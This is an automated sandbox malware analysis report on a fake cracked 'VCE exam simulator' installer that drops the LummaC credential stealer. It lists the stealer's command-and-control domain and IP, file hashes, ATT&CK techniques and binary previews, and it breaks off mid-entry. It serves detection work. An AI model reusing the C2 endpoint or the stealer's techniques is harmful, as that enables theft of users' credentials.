            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
            Source: Yara matchFile source: Process Memory Space: Spa.com PID: 7600, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: Spa.com PID: 7600, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
            Windows Management Instrumentation            		1
            DLL Side-Loading            		12
            Process Injection            		11
            Masquerading            		2
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services41
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		11
            Virtualization/Sandbox Evasion            		LSASS Memory11
            Virtualization/Sandbox Evasion            		Remote Desktop ProtocolData from Removable Media2
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		Logon Script (Windows)Logon Script (Windows)12
            Process Injection            		Security Account Manager3
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive13
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information            		NTDS12
            File and Directory Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets23
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\459250\Spa.com0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://bithithol.click:443/api0%Avira URL Cloudsafe
            http://localhost/data.svc0%Avira URL Cloudsafe
            https://bithithol.click/0%Avira URL Cloudsafe
            http://schemas.microsoft.co70%Avira URL Cloudsafe
            http://www.microsoft.cov8GM0%Avira URL Cloudsafe
            https://bithithol.click/api0%Avira URL Cloudsafe
            https://bithithol.click/apim0%Avira URL Cloudsafe
            http://www.micros-core-marshal-l1-1-0.dll0%Avira URL Cloudsafe
            http://www.xrml.org/schema/2001/11/xrml2core0%Avira URL Cloudsafe
            http://crl.microso0%Avira URL Cloudsafe
            http://crl.microsoft.0%Avira URL Cloudsafe
            https://bithithol.click/api=0%Avira URL Cloudsafe
            http://www.microso1.0800)40%Avira URL Cloudsafe
            https://bithithol.click/api:0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            bithithol.click
            		104.21.33.227
            		truetrue
              		unknown
              UJXheBevpnMncefcEO.UJXheBevpnMncefcEO
              		unknown
              		unknownfalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://bithithol.click/apitrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.microsoft.cov8GMvce exam simulator 2.2.1 crackk.exefalse
                • Avira URL Cloud: safe
                		unknown
                http://localhost/data.svcvce exam simulator 2.2.1 crackk.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/chrome_newtabSpa.com, 0000000A.00000003.2051241546.0000000001D85000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://duckduckgo.com/ac/?q=Spa.com, 0000000A.00000003.2051241546.0000000001D85000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Spa.com, 0000000A.00000003.2110972526.0000000001D83000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Spa.com, 0000000A.00000003.2051241546.0000000001D85000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://asp.net/ApplicationServices/v200TUvce exam simulator 2.2.1 crackk.exefalse
                          		high
                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Spa.com, 0000000A.00000003.2051123542.0000000004544000.00000004.00000800.00020000.00000000.sdmp, Spa.com, 0000000A.00000003.2051002372.000000000454B000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.autoitscript.com/autoit3/Spa.com, 0000000A.00000003.2000406005.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Spa.com.1.dr, Earned.0.drfalse
                              		high
                              http://crl.microsovce exam simulator 2.2.1 crackk.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiSpa.com, 0000000A.00000003.2110972526.0000000001D83000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.microsoft.co7vce exam simulator 2.2.1 crackk.exefalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://bithithol.click:443/apiSpa.com, 0000000A.00000002.2229183883.0000000001CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://x1.c.lencr.org/0Spa.com, 0000000A.00000003.2109576361.000000000451C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://x1.i.lencr.org/0Spa.com, 0000000A.00000003.2109576361.000000000451C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSpa.com, 0000000A.00000003.2051123542.0000000004520000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSpa.com, 0000000A.00000003.2051241546.0000000001D85000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.ietf.org/rfc/rfc2396.txtvce exam simulator 2.2.1 crackk.exefalse
                                          		high
                                          http://tempuri.org/.vce exam simulator 2.2.1 crackk.exefalse
                                            		high
                                            https://support.mozilla.org/products/firefoxgro.allSpa.com, 0000000A.00000003.2110571625.0000000005DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Spa.com, 0000000A.00000003.2110972526.0000000001D83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.micros-core-marshal-l1-1-0.dllvce exam simulator 2.2.1 crackk.exefalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://bithithol.click/Spa.com, 0000000A.00000002.2228906491.0000000001B2E000.00000004.00000020.00020000.00000000.sdmp, Spa.com, 0000000A.00000003.2228208170.0000000001D50000.00000004.00000020.00020000.00000000.sdmp, Spa.com, 0000000A.00000003.2227913157.0000000001D50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgSpa.com, 0000000A.00000003.2110972526.0000000001D83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoSpa.com, 0000000A.00000003.2051241546.0000000001D85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://bithithol.click/apimSpa.com, 0000000A.00000003.2228131384.0000000004475000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.xrml.org/schema/2001/11/xrml2corevce exam simulator 2.2.1 crackk.exefalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Spa.com, 0000000A.00000003.2051241546.0000000001D85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0Spa.com, 0000000A.00000003.2109576361.000000000451C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaSpa.com, 0000000A.00000003.2110972526.0000000001D83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.autoitscript.com/autoit3/XSpa.com, 0000000A.00000000.1807694151.0000000000525000.00000002.00000001.01000000.00000007.sdmp, Spa.com, 0000000A.00000003.2000406005.000000000498B000.00000004.00000800.00020000.00000000.sdmp, Spa.com.1.dr, Earned.0.drfalse
                                                            		high
                                                            http://ocsp.rootca1.amazontrust.com0:Spa.com, 0000000A.00000003.2109576361.000000000451C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Spa.com, 0000000A.00000003.2051123542.0000000004544000.00000004.00000800.00020000.00000000.sdmp, Spa.com, 0000000A.00000003.2051002372.000000000454B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://nsis.sf.net/NSIS_ErrorErrorvce exam simulator 2.2.1 crackk.exefalse
                                                                  		high
                                                                  https://www.ecosia.org/newtab/Spa.com, 0000000A.00000003.2051241546.0000000001D85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSpa.com, 0000000A.00000003.2110571625.0000000005DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://asp.net/ApplicationServices/v200vce exam simulator 2.2.1 crackk.exefalse
                                                                        		high
                                                                        http://crl.microsoft.vce exam simulator 2.2.1 crackk.exefalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://ac.ecosia.org/autocomplete?q=Spa.com, 0000000A.00000003.2051241546.0000000001D85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.microso1.0800)4vce exam simulator 2.2.1 crackk.exefalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://crl.mvce exam simulator 2.2.1 crackk.exefalse
                                                                            		high
                                                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgSpa.com, 0000000A.00000003.2110972526.0000000001D83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://support.microsofSpa.com, 0000000A.00000003.2051002372.000000000454B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?Spa.com, 0000000A.00000003.2109576361.000000000451C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSpa.com, 0000000A.00000003.2051123542.0000000004520000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://bithithol.click/api=Spa.com, 0000000A.00000003.2137360620.0000000004475000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://bithithol.click/api:Spa.com, 0000000A.00000002.2229354757.0000000001CF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Spa.com, 0000000A.00000003.2051241546.0000000001D85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://crl.microsvce exam simulator 2.2.1 crackk.exefalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        104.21.33.227
                                                                                        		bithithol.clickUnited States
                                                                                        		13335CLOUDFLARENETUStrue

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1580415
                                                                                        Start date and time:2024-12-24 13:51:14 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 6m 20s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:15
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:vce exam simulator 2.2.1 crackk.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@22/21@2/1
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Stop behavior analysis, all processes terminated

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: vce exam simulator 2.2.1 crackk.exe

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        07:52:15API Interceptor1x Sleep call for process: vce exam simulator 2.2.1 crackk.exe modified
                                                                                        07:52:40API Interceptor8x Sleep call for process: Spa.com modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        No context

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        bithithol.clicktxUcQFc0aJ.exeGet hashmaliciousLummaCBrowse
                                                                                        • 172.67.151.61

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSiUKUR1nUyD.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 172.67.199.72
                                                                                        j6ks0Fxu6t.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.36.201
                                                                                        wIgjKoo9iI.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.36.201
                                                                                        Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.20.86.8
                                                                                        Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.20.86.8
                                                                                        Audio02837498.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.25.14
                                                                                        SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                                        • 104.21.80.1
                                                                                        cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                                        • 104.21.67.146
                                                                                        Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 172.67.177.134
                                                                                        fnCae9FQhg.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.36.201

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        a0e9f5d64349fb13191bc781f81f42e1iUKUR1nUyD.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 104.21.33.227
                                                                                        j6ks0Fxu6t.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.33.227
                                                                                        wIgjKoo9iI.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.33.227
                                                                                        Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.33.227
                                                                                        RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                        • 104.21.33.227
                                                                                        fnCae9FQhg.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.33.227
                                                                                        bG89JAQXz2.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.33.227
                                                                                        SFtDA07UDr.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.33.227
                                                                                        3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.33.227
                                                                                        oiF7u78bY2.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.33.227

                                                                                        Dropped Files

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        C:\Users\user\AppData\Local\Temp\459250\Spa.comLVDdWBGnVE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          eMBO6wS1b5.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              AxoPac.exeGet hashmaliciousLummaCBrowse
                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                    fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                      ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                        94e.exeGet hashmaliciousRemcosBrowse
                                                                                                          94e.exeGet hashmaliciousRemcosBrowse

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\Local\Temp\459250\Spa.com

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:modified
                                                                                                            Size (bytes):947288
                                                                                                            Entropy (8bit):6.630612696399572
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                            MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                            SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                            SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                            SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: LVDdWBGnVE.exe, Detection: malicious, Browse
                                                                                                            • Filename: eMBO6wS1b5.exe, Detection: malicious, Browse
                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                            • Filename: AxoPac.exe, Detection: malicious, Browse
                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                            • Filename: fkawMJ7FH8.exe, Detection: malicious, Browse
                                                                                                            • Filename: ChoForgot.exe, Detection: malicious, Browse
                                                                                                            • Filename: 94e.exe, Detection: malicious, Browse
                                                                                                            • Filename: 94e.exe, Detection: malicious, Browse
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\459250\y

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):489066
                                                                                                            Entropy (8bit):7.999619972154411
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:12288:N1er2jxeCLes1DGwR+H3l6w+LEEWj6sXoaizxX9ERvzd2u:PeMeCjD+l6wjrtgXazdz
                                                                                                            MD5:1B1CFCCCAC015EB509C26B050FF40FA3
                                                                                                            SHA1:710098941144DBFE9615181304C0948CFBDE5B63
                                                                                                            SHA-256:79B16B0F62627BBE76E505EF42DAD2C52EA33296059042193479A7A1EC813AD3
                                                                                                            SHA-512:04A9FBDFE42B51AF89306730AF8A3BA6A74DA57848EA855D8CF5AB552C0BDD46C9BE67B514F6E74056FB5608AEC2A6A0B31CAB468A1B1F5FB1A6F5047F07B69C
                                                                                                            Malicious:false
                                                                                                            Preview:\.RYZ"..*:b`...<9.s...l.l:./.0..G.l......^.<h..../...W][.B...u.. ...~..>...}/.t..j..{..i......~.....Y...Qr...yF*...n*sm.c0..f.e....G.|.3V5...r.;v{.H...s...w...a.g.....9.-.i...).H....@.z.p..d.N..)......<p.....N........=.<.}.......|....pFX.m....q...*.5W..../_.'.*....T.[.9.5.D..w!.[R...8(..O)b......f.b...M%!..]E.=....T..K...n.....fh..)G..n.#.p$...d....j.*v.t......%7....7.(.J...._..{Q.<.....vf.L...r....sB......+...w....c}...e.[-...sb..... D...E.e....y..$^^!&b....`.y...........m....ki..............%.Zj.2z..w.U......B..<]/...........E.2.G...m..7K......^........H.y...S.{.S<bP...*..Q..{.../..E...!..S.z.M)...H.W.-h..9../h28.~j=......<b...Wjp.S..2\...).\.Ba.Ku3.T......5......K.`.....Q.L*5.....B0.k.%.r.f.7..~....P..98...w.1T^......e{L4......2q...;....r....aD...b.....#.<M.DQ2.kx.......]Y..e....J...8Hz].$b....R.8v....J;on)ZjDt..N.q}....A.....Y.ivAI...4d..6....m9..k..D.j._..n...}4....eI..x|.U.."..SY.........L{..n.}..."......L...........

                                                                                                            C:\Users\user\AppData\Local\Temp\Branches

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2081
                                                                                                            Entropy (8bit):5.070042231864157
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:+9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq11:WSEA5O5W+MfH5S/
                                                                                                            MD5:E4763704B522C56796F3B162BFE03667
                                                                                                            SHA1:673776FCE5C6ED3831AC6EC2E344204FC7085782
                                                                                                            SHA-256:CEEF4F2548CEB6B6301E5F739F814AF013E94F612F2905E9868902403B1BD606
                                                                                                            SHA-512:1AFFB31BBE5C7AB72397364105172C47AF8600EC8D5E65B96FF1E28CBBB81B8B873FC49F34C5847B683B54C911E88748EDE8DE36F4D8B27A49B66E21646C26D7
                                                                                                            Malicious:false
                                                                                                            Preview:Sorry........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B...........................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\Earned

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):143420
                                                                                                            Entropy (8bit):5.973357914509979
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:o6whxjgarB/5elDWy4ZNoGmROL7F1G7ho2kOb:o6ggarZ8aBZ2GmRq76tl
                                                                                                            MD5:23DC1CB4608CC0D9EE4C19EBC5AFBB18
                                                                                                            SHA1:F5FE6094613514A78E2AD8A720A90CB63E7BFF63
                                                                                                            SHA-256:AE5DABE69C7BC3014BC84F528D9D6F9E5180FB291AC67606BB6ADD1E9197877D
                                                                                                            SHA-512:3B9D99FE33BC392841B2CF60F3410AB812B8B412407B91269B272B6B8812EB1A97E3147A6A9397217DFE933BB46DA55F5BCEE32A0C867BDDBD96DE6AE8614366
                                                                                                            Malicious:false
                                                                                                            Preview: sequence is too large.invalid UTF-32 string.setting UTF is disabled by the application.non-hex character in \x{} (closing brace missing?).non-octal character in \o{} (closing brace missing?).missing opening brace after \o.parentheses are too deeply nested.invalid range in character class.group name must start with a non-digit.parentheses are too deeply nested (stack check).digits missing in \x{} or \o{}.regular expression is too complicated........................................*.+.,.-......7.8.9.:......D.E.F.G......Q.R.S.T......^._.`.a......j.k.l.m...........................@...................`........................... ................... ...........@....................................................................... ...............................................................................................................................................\.P.{.N.d.}.....\.P.{.X.p.s.}...\.p.{.X.p.s.}...........................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\Edmonton

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):116736
                                                                                                            Entropy (8bit):6.559145542500214
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:5CThpmESv+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTul:5CThp6vmVnjphfhnvO5bLezWWl
                                                                                                            MD5:06ECE30ED01E9139273D23780FDE06CE
                                                                                                            SHA1:93DB739A7E38240EFD6F5882A96EC2D8E7F60D4D
                                                                                                            SHA-256:00F13203712206A9A40B5FD141AA776E33977537158928DED8EB1FCCF86A6848
                                                                                                            SHA-512:3992FB483F9E165758836A94475872E3F447CC59538F5CB020706B0F30AC18BC21B46C2A21870349FA1F3AABC65E473E68CAB46C1C0A8D3C891CD088A78F10F7
                                                                                                            Malicious:false
                                                                                                            Preview:D....;.u.h`~L..L$D.I....M.h..I.........@..|8...L8.t..I83.F.q..|8...L8.t..I83.Y..L$@..m..........S..p.I..D$.Ph4.J.VSh..J...X.I.....v....D$..T$<Rh..J.P........Q....D$<S.t$D..P.R.....0....M..5...j...j.V.....L$..D$|.....j.S.....SPQ.R..D$pP.L$T..B..P.L$.. ...j.j..D$.PV.5.......L$..iu...L$P.XL...D$..T$pSRP...Q .D$pP.L$T..A..P.L$......j.j..D$.PV.........L$...u...L$P..L...D$..T$pSRP...Q(.D$pP.L$T..A..P.L$.....j.j..D$.PV........L$...t...L$P..K...D$..T$pSRP...Q..D$pP.L$T.3A..P.L$..<...j.j..D$.PV.Q.......L$..t...L$P.tK...D$..T$hRS.T$x..RP.Q@.D$pP.L$T..@..P.L$......j.j..D$.PV.........L$..4t...L$P.#K...D$h3.D$.3.@.\$.j.P.D$$.D$.PV.........L$...s...D$..T$lRP...Q8.D$l.D$.3..\$.@j.P.D$$.D$.PV........L$...s.....H..D9.8\9.t..@8.X..D9.8\9.t..@8.X..D$<P...Q..D$.P...Q...t.I..L$@.pJ.._^3.[..]...U.....E...T....@.SVW.0.....m....F..L$.Q.0....I..]....u:....s...#.3.B.S....H..|9...D9.t..@8.P..|9...D9.t..@8.@...$P....I..|$,3..t$0....r...C......3.{._^3.[..]...U.....E........@.SV..0..W3.......F...$....Q.0.

                                                                                                            C:\Users\user\AppData\Local\Temp\Est

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
